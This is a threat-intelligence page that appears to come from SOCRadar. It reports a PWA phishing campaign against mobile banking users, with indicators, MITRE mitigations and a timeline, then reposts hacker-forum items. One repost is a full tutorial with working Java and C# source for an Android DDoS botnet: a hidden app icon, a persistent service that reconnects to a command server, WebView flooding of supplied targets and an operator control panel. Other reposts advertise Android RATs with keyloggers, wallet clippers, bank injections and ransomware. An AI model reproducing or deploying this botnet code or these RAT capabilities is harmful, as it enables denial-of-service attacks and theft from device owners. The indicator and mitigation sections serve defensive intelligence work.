campaign image
PWA Phishing Attacks Targeting Mobile Banking: The Next Generation Cyber Threat
BankingFraud PhishingAttacks PWA IOS Android

This campaign targets a new phishing attack using Progressive Web Apps (PWA), where attackers target users' identity data with fake banking applications. The flexibility of PWA technology makes these attacks more dangerous.

Domains Source Last Update
cyrptomaker.info SOCRadar 2024-08-28
blackrockapp.eu SOCRadar 2024-08-28
hide-me.online SOCRadar 2024-08-28
play-protect.pro SOCRadar 2024-08-28
csas.georgecz.online SOCRadar 2024-08-28
Hashes Source Last Update
66F97405A1538A74CEE4209E59A1E22192BC6C08 SOCRadar 2024-08-28
D3D5AE6B8AE9C7C1F8690452760745E18640150D SOCRadar 2024-08-28
Ipv4s Source Last Update
188.114.96.9 SOCRadar 2024-08-28
185.68.16.56 SOCRadar 2024-08-28
185.181.165.124 SOCRadar 2024-08-28
172.67.182.151 SOCRadar 2024-08-28
46.175.145.67 SOCRadar 2024-08-28
Cves Source Last Update
Emails Source Last Update
Domains Insert Date

MITIGATION


T1660 Phishing


ID

Mitigation

Description

M1058

Antivirus/Antimalware

Some mobile security products offer a loopback VPN used for inspecting traffic. This could proactively block traffic to websites that are known for phishing or appear to be conducting a phishing attack.

M1011

User Guidance

Users can be trained to identify social engineering techniques and phishing emails.



T1417.002 Input Capture: GUI Input Capture


ID

Mitigation

Description

M1012

Enterprise Policy

An EMM/MDM can use the Android DevicePolicyManager.setPermittedAccessibilityServices method to set an explicit list of applications that are allowed to use Android's accessibility features.

M1006

Use Recent OS Version

The HIDE_OVERLAY_WINDOWS permission was introduced in Android 12 allowing apps to hide overlay windows of type TYPE_APPLICATION_OVERLAY drawn by other apps with the SYSTEM_ALERT_WINDOW permission, preventing other applications from creating overlay windows on top of the current application.[40]



T1437.001 Application Layer Protocol: Web Protocols

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.


REMEDIATION


T1660 Phishing


ID

Data Source

Data Component

Detects

DS0029

Network Traffic

Network Traffic Content

Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious.



Network Traffic Flow

Enterprises may be able to detect anomalous traffic   originating from mobile devices, which could indicate compromise.


T1417.002 Input Capture: GUI Input Capture


ID

Data Source

Data Component

Detects

DS0041

Application Vetting

Permissions Requests

Application vetting services can look for applications requesting the android.permission.SYSTEM_ALERT_WINDOW permission in the list of permissions in the app manifest.

DS0042

User Interface

System Settings

An Android user can view and manage which applications hold the SYSTEM_ALERT_WINDOW permission through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu 

location may vary between Android versions).



T1437.001 Application Layer Protocol: Web Protocols


This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.


CONCLUSION

The research identifies a new phishing method that blends traditional social engineering with the flexibility of Progressive Web Apps (PWA). This method specifically targets Android users by using WebAPK technology to create fake versions of legitimate app pages on the Google Play store. Most of these attacks are focused in the Czech Republic, with two additional cases found in Hungary and Georgia. The fact that two distinct command and control (C&C) systems are in use suggests that two different groups may be responsible for these phishing efforts. Due to the complexity and close resemblance of these phishing apps to genuine ones, it is expected that similar attacks will become more common. Identifying the difference between real and fake apps after installation continues to be a significant challenge.


File Name Description Actions
APT Name Aliases Target Countries Source Countries Total IOCs
timeline History Timeline

  • Wed, 28 Aug 2024 16:47:04 GMT
    New IOC's Added

    Total 12 IOC's added.

  • Wed, 28 Aug 2024 12:24:02 GMT
    Created!

    New Campaign created.

  • Tue, 20 Aug 2024 00:00:00 GMT
    Czech Mobile Users Targeted in New Banking Credential Theft Scheme

    Mobile users in the Czech Republic are the target of a novel phishing campaign that leverages a Progressive Web Application (PWA) in an attempt to steal their banking account credentials.

    Go to Link


  • Fri, 01 Mar 2024 00:00:00 GMT
    First discovery of command and control (C2) servers
    Command and control (C2) servers receiving information from phishing applications were first discovered in March 2024. Data on the servers confirmed they were likely previously non-operational.
  • Wed, 01 Nov 2023 00:00:00 GMT
    First Case

    The first case of PWA phishing was detected in early November 2023 and its migration to WebAPKs was noticed in mid-November 2023.


    Go to Link


  • Wed, 01 Nov 2023 00:00:00 GMT
    Progressive Web Application (PWA)

    This technique was first disclosed by CSIRT KNF in Poland in July 2023 and, in November 2023, observed in Czechia by ESET analysts working on the Brand Intelligence service. We also observed two cases of mobile campaigns against banks outside of Czechia: one case targeting the Hungarian OTP Bank and another targeting the Georgian TBC Bank.


    Go to Link


newspaper Dark Web News




dark web image
The Alleged Source Code of DDoS Android Botnet is Shared

 In a hacker forum monitored by SOCRadar, a new alleged source code share is detected for DDoS Android Botnet. https://image.socradar.com/screenshots/2024/09/25/c88b4e81-c783-4812-a26d-d00168c0de8a.pnghttps://image.socradar.com/screenshots/2024/09/25/c89393b0-a0f9-43fd-bc04-7a2398bd2042.pnghttps://image.socradar.com/screenshots/2024/09/25/628cc0e0-028c-4591-9bce-d45c7e2268b5.pnghttps://image.socradar.com/screenshots/2024/09/25/18c18729-8638-440d-9c50-f26861e400cb.pnghttps://image.socradar.com/screenshots/2024/09/25/4dcd2422-2480-4971-b8e7-6c17ede52fc2.pnghttps://image.socradar.com/screenshots/2024/09/25/7d4565f9-e28e-49bd-9299-e67e9d6182ae.pnghttps://image.socradar.com/screenshots/2024/09/25/e378fb30-3059-4f76-bb71-ad252fa075ff.pnghttps://image.socradar.com/screenshots/2024/09/25/f5410ebf-8e8c-425b-8120-632d924bb33b.pngHello everyone: zns6: I have long planned to write this article, but there was no time because of my other projects. Now freed and finally decided to write an article about DDoS Botnet on Android. To begin with, I’ll explain what it is DDoS Botnet in principle, although I do not think that this needs an explanation, but in any case for the article it is necessary: DDoS-Botnet — is a network of infected devices controlled by an attacker to conduct distributed denial of service attacks (DDoS — Distributed Denial of Service) In such a network, every infected computer (or any other device, for example, a smartphone running Androidas in our case) becomes part of the botnet and receives commands from the server, receiving target addresses for attack. We will not do any ordinary HTTP Flood, working through queries, but fully downloading the web resource, in our case through WebView. I will also add another DDoS method exclusively for the example — for example, I will take ping, it is the easiest to implement, but also borders on the useless. In any case, this is not important, as it will be added as a practical example. Subsequently, replacing it with other methods will not be a problem for you if you use the code from the article. I will use to write the server part C # (.NET 4.8) and WPF markup (Windows Presentation Foundation) I will use to write the client part Java (A) and Groovy dsl (build.gradle) with minimum API 28 (A9). I'll start with the code Android customer on Java. First we need to define permissions in ** XML: <uses-permission android:name=**.INTERNET" /> <uses-permission android:name=**.ACCESS_NETWORK_STATE" /> <uses-permission android:name=**n.WAKE_LOCK" /> <uses-permission android:name=**.FOREGROUND_SERVICE" /> <uses-permission android:name=**.FOREGROUND_SERVICE_DATA_SYNC" /> Also, if you want the icon of your application not to be visible, add to Activity inside AndroidManifest.xml following: XML: <category android:name="android.intent.category.LEANBACK_LAUNCHER" /> Since in MainActivity.java we will have nothing but launching our FOREGROUND_SERVICEthen its code will look like this: Java: package com.nmz.DDoSBTest; import android.content.Intent; import android.os.Bundle; import androidx.appcompat.app.AppCompatActivity; public class MainActivity extends AppCompatActivity { @** protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); Intent serviceIntent = new Intent(MainActivity.this, BackgroundWVService.class); //Запуск нашего сервиса до которого мы еще дойдем startService(serviceIntent); } } Nothing but launching the service happens, but I would like to go not immediately to it, but to talk a little about how our page will be downloaded through Webview. For this, there is a code in the code WebViewService.javawhich has the task of downloading the page in Adb display information about her in short. Code WebViewService.java: Java: private WebView webView; @** public void onCreate() { super.onCreate(); webView = new WebView(this); webView.setWebViewClient(new CustomWebViewClient()); webView.getSettings().setJavaScriptEnabled(true); } @** public int onStartCommand(Intent intent, int flags, int startId) { String url = intent.getStringExtra("url"); if (url != null) { if (!isValidUrl(url)) { url = "http://" + url; } Log.d(TAG, "Loading URL/IP in WebView: " + url); webView.loadUrl(url); } else { Log.e(TAG, "No URL/IP received"); } return START_NOT_STICKY; } @** public void onDestroy() { if (webView != null) { webView.destroy(); } super.onDestroy(); } @** public IBinder onBind(Intent intent) { return null; } private boolean isValidUrl(String url) { return url.startsWith("http://") || url.startsWith("https://"); } private class CustomWebViewClient extends WebViewClient { @** public void onPageStarted(WebView view, String url, android.graphics.Bitmap favicon) { super.onPageStarted(view, url, favicon); Log.d(TAG, "Page loading: " + url); } @** public void onPageFinished(WebView view, String url) { super.onPageFinished(view, url); Log.d(TAG, "Page finished loading: " + url); String title = view.getTitle(); Log.d(TAG, "Page title: " + title); } @** public void onReceivedHttpError(WebView view, WebResourceRequest request, android.webkit.WebResourceResponse errorResponse) { super.onReceivedHttpError(view, request, errorResponse); Log.e(TAG, "HTTP error for URL/IP: " + request.getUrl() + " Error code: " + errorResponse.getStatusCode()); } @** public void onReceivedError(WebView view, int errorCode, String description, String failingUrl) { super.onReceivedError(view, errorCode, description, failingUrl); Log.e(TAG, "Error loading URL/IP: " + failingUrl + " Error code: " + errorCode + " Description: " + description); } } } The code uploads the web page to Webview and displays brief content about her. Now I would like to mark the code AttackerReceiverURLIP.javawho gets IP or URL the site, then checks it for validation, and if it receives IP without the HTTP / HTPPS header, then adds it and sends it further to WebViewService.java. Code AttackerReceiverURLIP.java: Java: public class AttackerReceiverURLIP extends BroadcastReceiver { @** public void onReceive(Context context, Intent intent) { String url = intent.getStringExtra("url"); Log.d("UrlReceiver", "Received URL: " + url); if (url != null) { // Проверка и добавление префикса например если передан ip ну и проверочка if (!url.startsWith("http://") && !url.startsWith("https://")) { url = "https://" + url; } if (isValidUrl(url)) { Intent serviceIntent = new Intent(context, WebViewService.class); serviceIntent.putExtra("url", url); context.startService(serviceIntent); } else { Log.e("UrlReceiver", "Invalid URL received: " + url); } } } private boolean isValidUrl(String url) { return url != null && (url.startsWith("http://") || url.startsWith("https://")); } } Now you should go to the last service on the client side — this BackgroundWVService.java, and here, accordingly, its code: Java: private static final String CHANNEL_ID = "DDoSForegroundServiceChannel"; private Handler ReconnectServerHandler = new Handler(Looper.getMainLooper()); private boolean isConnected = false; private Socket clientSocket; private BufferedReader input; private OutputStream output; @** public void onCreate() { //инициализации в onCreate super.onCreate(); createNotificationChannel(); startForegroundService(); connectToServer(); } private void createNotificationChannel() { //13,14D требуют подобных извращений. if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) { CharSequence name = "Foreground Service"; String description = "Channel"; int importance = NotificationManager.IMPORTANCE_DEFAULT; NotificationChannel channel = new NotificationChannel(CHANNEL_ID, name, importance); channel.setDescription(description); NotificationManager notificationManager = getSystemService(NotificationManager.class); notificationManager.createNotificationChannel(channel); } } private void startForegroundService() { Intent notificationIntent = new Intent(this, MainActivity.class); PendingIntent pendingIntent = PendingIntent.getActivity(this, 0, notificationIntent, PendingIntent.FLAG_IMMUTABLE); Notification notification = new NotificationCompat.Builder(this, CHANNEL_ID) .setContentTitle("Foreground Service") .setContentText("Service is running in the background") .setSmallIcon(R.mipmap.ic_launcher) .setContentIntent(pendingIntent) .build(); startForeground(1, notification); } @** public int onStartCommand(Intent intent, int flags, int startId) { return START_STICKY; } private void connectToServer() { new ConnectToServerTask().execute("127.0.0.1", "6666");//ip:p сервера } private class ConnectToServerTask extends AsyncTask<String, Void, Boolean> { private String serverIp; private int serverPort; @** protected Boolean doInBackground(String... params) { serverIp = params[0]; serverPort = Integer.parseInt(params[1]); while (!isConnected) { try { clientSocket = new Socket(serverIp, serverPort); input = new BufferedReader(new InputStreamReader(clientSocket.getInputStream())); output = clientSocket.getOutputStream(); isConnected = true; new ReceiveMessagesTask().start(); } catch (Exception e) { Log.e("ConnectToServerTask", "Error connecting to server, retrying in 5 seconds", e); try { Thread.sleep(5000); } catch (InterruptedException ie) { Log.e("ConnectToServerTask", "Interrupted during reconnection delay", ie); } } } return false; } @** protected void onPostExecute(Boolean result) { if (result) { Toast.makeText(getApplicationContext(), "Connected to the server", Toast.LENGTH_SHORT).show(); } else { startReconnection(); } } } private void startReconnection() { ReconnectServerHandler.postDelayed(() -> { if (!isConnected) { Log.d("Reconnection", "Attempting to reconnect..."); connectToServer(); } }, 5000); } private class SendMessageTask extends AsyncTask<String, Void, Void> { private static final int CHUNK_SIZE = 1024; private static final long DELAY_MS = 500; @** protected Void doInBackground(String... messages) { try { if (isConnected && output != null) { for (String message : messages) { byte[] messageBytes = message.getBytes(); int length = messageBytes.length; for (int i = 0; i < length; i += CHUNK_SIZE) { int end = Math.min(length, i + CHUNK_SIZE); output.write(messageBytes, i, end - i); output.flush(); Thread.sleep(DELAY_MS); } } } } catch (Exception e) { Log.e("SendMessageTask", "Error sending message", e); } return null; } } private class ReceiveMessagesTask extends Thread { private final Handler uiHandler = new Handler(Looper.getMainLooper()); @** public void run() { try { while (isConnected) { String message = input.readLine(); if (message != null) { if (isValidUrl(message)) { handleUrl(message); } else { uiHandler.post(() -> Toast.makeText(getApplicationContext(), "msg s: " + message, Toast.LENGTH_LONG).show()); } } } } catch (Exception e) { Log.e("ReceiveMessagesTask", "Connection lost, attempting to reconnect", e); isConnected = false; startReconnection(); } } } private void handleUrl(String url) { //Добавление http чтобы если например человек передал ip то мы перешли по нему как и по ссылке if (!url.startsWith("http://") && !url.startsWith("https://")) { url = "https://" + url; } Intent intent = new Intent(BackgroundWVService.this, WebViewService.class); intent.putExtra("url", url); startService(intent); } private boolean isValidUrl(String url) { try { Uri uri = Uri.parse(url); return uri.getScheme() != null && (uri.getScheme().equals("http") || uri.getScheme().equals("https")); } catch (Exception e) { return false; } } @** public void onDestroy() { super.onDestroy(); try { isConnected = false; if (clientSocket != null) { clientSocket.close(); } } catch (Exception e) { Log.e("onDestroy", "Error closing socket", e); } } @** public IBinder onBind(Intent intent) { return null; } } The customer code is over. I did not describe some already understandable moments, such as the whole code Manifest or sending specific data to the server, such as the version Android or device model, although you can easily get them and send them to the server if you wish. Java: AndroidVersion = "Android Version: " + Build.VERSION.RELEASE; SDeviceModel = "Device Model: " + Build.MODEL; Now that everything is more or less clear with the client code and what happens on its side, you can proceed to the server code. On the server side there will be no builder or any — screws exclusively the functionality of sending data to the server and receiving responses from the client. Code DDoServer: C #: public partial class MainWindow : Window { private ObservableCollection<ClientInfo> _clients; private TcpListener _server; private Thread _serverThread; private Thread _monitorThread; private int _serverPort = 4444; //стандартный порт прослушивания private Dictionary<string, string> _clientMessages; private volatile bool _isServerRunning; private ConcurrentDictionary<string, TcpClient> _connectedClients; public MainWindow() { InitializeComponent(); _clients = new ObservableCollection<ClientInfo>(); //Инициализации clientsview.ItemsSource = _clients; _clientMessages = new Dictionary<string, string>(); _connectedClients = new ConcurrentDictionary<string, TcpClient>(); } Handler StartServer: C #: if (_serverThread != null && _serverThread.IsAlive) { MessageBox.Show("Server is already running."); return; } if (!int.TryParse(portTextBox.Text, out _serverPort)) { MessageBox.Show("Invalid port number. Please enter a valid number."); return; } _serverThread = new Thread(StartServer); _serverThread.IsBackground = true; _serverThread.Start(); _monitorThread = new Thread(MonitorClients); _monitorThread.IsBackground = true; _monitorThread.Start(); } Methods / Other: C #: private void StartServer() { try { _server = new TcpListener(IPAddress.Any, _serverPort); _server.Start(); _isServerRunning = true; Dispatcher.Invoke(() => MessageBox.Show($"Server started on port {_serverPort}")); while (_isServerRunning) { if (_server.Pending()) { TcpClient client = _server.AcceptTcpClient(); IPEndPoint clientEndPoint = client.Client.RemoteEndPoint as IPEndPoint; if (clientEndPoint != null) { string clientIp = clientEndPoint.Address.ToString(); if (_connectedClients.ContainsKey(clientIp)) { if (_connectedClients.TryRemove(clientIp, out TcpClient oldClient)) { oldClient.Close(); } } if (_connectedClients.TryAdd(clientIp, client)) { Dispatcher.Invoke(() => { var existingClient = _clients.FirstOrDefault(c => c.IPAddress == clientIp); if (existingClient == null) { _clients.Add(new ClientInfo { IPAddress = clientIp, TcpClient = client }); } else { existingClient.TcpClient = client; } MessageBox.Show($"New client connected: {clientIp}"); }); } Thread clientThread = new Thread(() => HandleClient(client, clientIp)); clientThread.IsBackground = true; clientThread.Start(); } } else { Thread.Sleep(100); } } } catch (SocketException ex) { if (ex.SocketErrorCode != SocketError.Interrupted) { Dispatcher.Invoke(() => MessageBox.Show($"Error: {ex.Message}")); } } catch (Exception ex) { Dispatcher.Invoke(() => MessageBox.Show($"Error: {ex.Message}")); } } private void HandleClient(TcpClient client, string clientIp) { try { NetworkStream stream = client.GetStream(); byte[] buffer = new byte[1024]; int bytesRead; while ((bytesRead = stream.Read(buffer, 0, buffer.Length)) > 0) { string message = Encoding.UTF8.GetString(buffer, 0, bytesRead); lock (_clientMessages) { _clientMessages[clientIp] = message; } SaveMessageToFile(clientIp, message); var lines = message.Split(new[] { '\n' }, StringSplitOptions.RemoveEmptyEntries); Dispatcher.Invoke(() => { foreach (var line in lines) { if (clientsview.SelectedItem is ClientInfo selectedClient && selectedClient.IPAddress == clientIp) { packetText.Text += line + Environment.NewLine; } } }); } } catch (Exception ex) { Console.WriteLine($"Client error: {ex.Message}"); } finally { Dispatcher.Invoke(() => { try { lock (_clients) { var clientInfo = _clients.FirstOrDefault(c => c.IPAddress == clientIp); if (clientInfo != null) { _clients.Remove(clientInfo); } } lock (_clientMessages) { if (_clientMessages.ContainsKey(clientIp)) { _clientMessages.Remove(clientIp); } } if (clientsview.SelectedItem is ClientInfo selectedClient && selectedClient.IPAddress == clientIp) { packetText.Text = string.Empty; } } catch (Exception uiEx) { Console.WriteLine($"UI error: {uiEx.Message}"); } }); try { client.Close(); } catch (Exception ex) { Console.WriteLine($"Error closing client connection: {ex.Message}"); } } } private void MonitorClients() { while (_isServerRunning) { foreach (var kvp in _connectedClients.ToList()) { string clientIp = kvp.Key; TcpClient client = kvp.Value; try { if (client.Client.Poll(0, SelectMode.SelectRead)) { byte[] check = new byte[1]; if (client.Client.Receive(check, SocketFlags.Peek) == 0) { Dispatcher.Invoke(() => { var clientInfo = _clients.FirstOrDefault(c => c.IPAddress == clientIp); if (clientInfo != null) { _clients.Remove(clientInfo); } lock (_clientMessages) { if (_clientMessages.ContainsKey(clientIp)) { _clientMessages.Remove(clientIp); } } if (clientsview.SelectedItem is ClientInfo selectedClient && selectedClient.IPAddress == clientIp) { packetText.Text = string.Empty; } }); _connectedClients.TryRemove(clientIp, out _); client.Close(); } } } catch (Exception ex) { Console.WriteLine($"Error monitoring client {clientIp}: {ex.Message}"); } } Thread.Sleep(5000); } } private void StopServer() { try { _isServerRunning = false; _server?.Stop(); foreach (var clientInfo in _clients.ToList()) { if (clientInfo.TcpClient != null && clientInfo.TcpClient.Connected) { clientInfo.TcpClient.Close(); } } _serverThread?.Join(); _monitorThread?.Join(); Dispatcher.Invoke(() => MessageBox.Show("Server stopped successfully.")); } catch (Exception ex) { Dispatcher.Invoke(() => MessageBox.Show($"Error stopping server: {ex.Message}")); } } Well, at the end of — code for sending information to the client: C #: string link = DDoSTx.Text; if (!string.IsNullOrWhiteSpace(link)) { SendMessageToAllClients(link); } else { MessageBox.Show("Write Link."); } --- foreach (var clientInfo in _clients.ToList()) { if (clientInfo.TcpClient != null && clientInfo.TcpClient.Connected) { try { NetworkStream stream = clientInfo.TcpClient.GetStream(); byte[] buffer = Encoding.UTF8.GetBytes(message + "\n"); stream.Write(buffer, 0, buffer.Length); stream.Flush(); Also added a code that sends a task to one selected client from the list. IP: C #: if (clientsview.SelectedItem is ClientInfo selectedClient) { string clientIp = selectedClient.IPAddress; if (_clientMessages.ContainsKey(clientIp)) { string link = DDoSTx.Text; if (!string.IsNullOrWhiteSpace(link)) { SendLinkToClient(clientIp, link); } else { MessageBox.Show("Write Link/Ip."); } } else { MessageBox.Show("Client not found."); } } else { MessageBox.Show("Select a client from the list of IP."); } } And the method for this business: C #: private void clientsview_SelectionChanged(object sender, SelectionChangedEventArgs e) { if (clientsview.SelectedItem is ClientInfo selectedClient) { if (_clientMessages.ContainsKey(selectedClient.IPAddress)) { packetText.Text = _clientMessages[selectedClient.IPAddress]; } } } View Attachment 94963 GUI server panel written in WPF (Windows Presentation Foundation) (a newer version than described in the article) includes markings and designs that were not described in the article. The article provided exclusively code without markup and design. I want to note that this can only be used for web resources in connection with the logic of working through WebView, but you can add your code for other attack methods you need. Thank you for your attention! If there are any questions or additions, I will be happy to discuss. All the best: smile10 :. ps: In the new versions of Android, the rules for working background services have been tightened, and the activity control system (BATTERY_OPTIMIZATIONS) can forcibly complete our process. To prevent this, you can add the following code to MainActivity.java: Java: if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) { if (!Settings.canDrawOverlays(this)) { showDisableBatteryOptimizationDialog(); } } } private void showDisableBatteryOptimizationDialog() { new AlertDialog.Builder(this) .setTitle("Отключение контроля активности") .setMessage("Для корректной работы приложения отключите контроль активности в настройках батареи.") .setPositiveButton("Перейти в настройки", (dialog, which) -> { Intent intent = new Intent(Settings.ACTION_IGNORE_BATTERY_OPTIMIZATION_SETTINGS); startActivity(intent); }) .setNegativeButton("Отмена", null) .show(); } You also need to add uses-permission to the file. AndroidManifest.xml: XML: <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/> by: **




dark web image
Viper Android Tool is on Sale

 In a hacker forum monitored by SOCRadar, a new Android tool sale which is called Viper is detected. https://image.socradar.com/screenshots/2024/05/20/ef2c35ca-92e5-4416-992a-07e7daca5813.pnghttps://image.socradar.com/screenshots/2024/05/20/6090560e-d6de-4bb2-ab4b-cfcc16893664.pngSPECIAL OPPORTUNITIESApk support for version 14. (verified on Android 14)Smooth hidden control Vnc (show text during control)VNC layout management (stable, no delay) Screen Reading Program | With this function, you can enter any banking application and withdraw money,The screen text logger + controller (which helps you track or control each individual bank and cryptocurrency transaction) to bypass the black screen problem. See the initial phrases of the wallet.Screenshot | show all Tasks in real time with a controlled screen |: unlock in one click ()PIN unlock Graphics Key Unlock Apk ➡ ➡ 💥 🔥 ▶ 🔼 ⌛ 📌➡ ⚙Lock PIN and graphic key (automatic definition) Delete the captured lock data (if the lock password was not captured correctly, prepare it again for re-capture with one click of the mouse) 🔥 Superfast keylogger (PIN code record, template, passwords (record all credentials) 🌐 Fisher link | This will help you redirect any real or phishing link that can intercept all the credentials. we provide more than 500 of the latest injections, including cryptocurrency and banks. Wallets and more 💸(Crypto Clipper: support for more than 40 wallets | Btc, eth, BNB, trc20, trc25 and others, | which will help you replace your wallet with the recipient's wallet address ( (You get all the cryptophonts that the victim can send anywhere) ✉ Read live notifications ‼Automatically uninstall Apk with command (no trace) 🚫Anti-removal 🖥SMS Interception Calls, Contacts, () File Manager © Turn on / off applications 📎Living camera (front / back) - 🎙Live microphone (speak / listen) And much more……. Accept translation from the guarantor of the forum


dark web image
A New Android RAT is on Sale

 In a hacker forum monitored by SOCRadar, a new andoid RAT sale is detected. https://image.socradar.com/screenshots/2024/05/09/d8c40df0-f382-469e-9fb2-b1fd610b14c5.pngAndroid RAT is the best on the market tg channel : https://** contact tg : https://** 1 month 1500 usd 2 month 2500 usd ~ Screen control ~ Hidden automatic permissions ~ Lock / unlock the screen but sometimes the first time may not unlock the password or pattern for this there is a button to reset the memory and recapture. there is also a solution to capture by giving the victim a phishing pattern or pin code to unlock. also you can see the pin code in the keylogger. ~ Keyboard for keystroke unlocking ~ Ransomeware (full phone lock and display message and QR code to pay money. ~ Black screen to silently control your phone ~ Text readers on screen ~ Anti-Uninstall ~ SMS Interception ~ Calls, Contacts, ~ File Manager - 11 crypto-injections (trustwallet, metamask, binance, exodus, bybit, huobi, sberbank, coinbase, kucoin, etc.) waits until the victim decides to log into the application and issues a phish request instead of the original application to capture logs. ~Enable / disable applications ~Live Camera (Front / Back) ~Live Microphone (talk / listen) ~Keylogger to capture all passwords, but it happens that not all passwords are captured or the victim may have a face ID or a finger to enter a particular application. - Screen Reader is a black screen reader for bypassing black screen in applications like revolution or smart id or authenticator. There are also issues with the crypto apk, as we are always trying to improve our crypto to bypass the protection of top banks, because it happens that Google does not detect the virus, but Sberbank for example does. Crypt can fall off because of some client to whom you will throw and he will not install and will send there to Google or to the virus total. In the panel it will be possible to make yourself an apk as much as you want plus I will give the latest actual method of crypto with the help of programs so that you can make yourself several apks. If the crypto falls off, all the clients that you put this particular apk with this crypto will disappear because they will also start detecting. And the victim can always stop you from turning off the phone or pulling out the SIM card or turning off the Internet or start clicking all the buttons when you turn off the screen, you have full access but the victim can stop you from doing anything so you have to learn how to do it. and so much more. Translated with ** (free version) https://image.socradar.com/screenshots/2024/05/09/4870bafb-15c2-4823-8d04-6086dd039d45.png


dark web image
Reaper Android Rat V6 is on Sale

 In a hacker forum monitored by SOCRadar, a new Reaper andoid RAT V6 sale is detected. https://image.socradar.com/screenshots/2024/04/29/c8079c6d-8b21-4e32-9805-2fe08cf95627.pngApk Support on version 14. (tested on android 14) Smooth Hidden Vnc Control (show text during control) Layout vnc control (stable no lag) Screen Reader | With this feature, you can enter any banking Application and withdraw Money, L'Screen Text Logger + controller (that Helps you to monitor or control every single bank and crypto transaction) bypass black screen problem. See wallet seed phrases. Screen Capturer | show all Tasks live with controllable screen : one click unlock() Pin Unlock Pattern Unlock Apk ?? Lpin and pattern lock (uto detect) Remove captured lock data (if did not capture the lock password correctly then make again ready to capture again in just one click) Super Fast keylogger (Record pin, pattern, passwords, (record all Credentials) Phisher link | the help you to redirect any real or phishing link that can Grab all credentials we provide 500 + latest injections including Crypto and banks. Wallets much more (Crypto Clipper: support 40+ wallets | Btc, eth, BNB, trc20, trc25 more, that help you to Replace your wallet into Receiver wallet address ( (You Get All Crypto Funds that the victim can send anywhere) Read Live Notifications !! Auto Delete Apk using Command (No Traces) Anti-Uninstall SMS interceptions Calls, Contacts, () File manager © Enable/Disable Apps Live Camera (Front/Back) Live microphone (Speak/listen) And many more.......




dark web image
New Android Spy SpinOk Module is Detected

In a hacker forum monitored by SOCRadar, a new android spy spinok module is detected. https://image.socradar.com/screenshots/2023/06/05/1d0ed28b-2000-4b83-9959-a6e2872f1218.pngDoctor Web has discovered a malicious Android.Spy.SpinOk module that can steal personal data and files from hundreds of millions of devices. Doctor Web has detected a new threat for Android device owners - Android.Spy.SpinOk, a malicious module that is embedded in various games and applications available in the official Google Play catalog. The module can collect and transfer users' personal data and files to attackers, as well as replace and upload the contents of the clipboard to a remote server. Android.Spy.SpinOk masquerades as a marketing tool that offers users mini-games, a task system, and prize draws. However, in fact, this module establishes a connection with the C&C server and sends it various technical information about the infected device, including data from sensors such as a gyroscope, magnetometer, etc. This allows attackers to bypass defense mechanisms and hide their activity from researchers. In addition, Android.Spy.SpinOk loads banner ads into the WebView with arbitrary links received from the C&C server. These banners contain JavaScript code that can access files and the clipboard on the user's device. Thus, attackers can steal confidential information such as passwords, card numbers, documents, etc. Doctor Web specialists found this Trojan module in 101 applications from Google Play that were downloaded at least 421,290,300 times. Among them are such popular programs as: Noizz: video editor with music (at least 100,000,000 installs), Zapya - Transfer, file exchange (at least 100,000,000 installations; the Trojan module was present from version 6.3.3 to version 6.4 and is not present in the current version 6.4.1), VFly: video editor&video maker (at least 50,000,000 installs), MVBit - MV video status maker (at least 50,000,000 installs), Biugo: magical video editor (at least 50,000,000 installs), The company has also reported the issue to Google and hopes it will be fixed soon.


Subscribe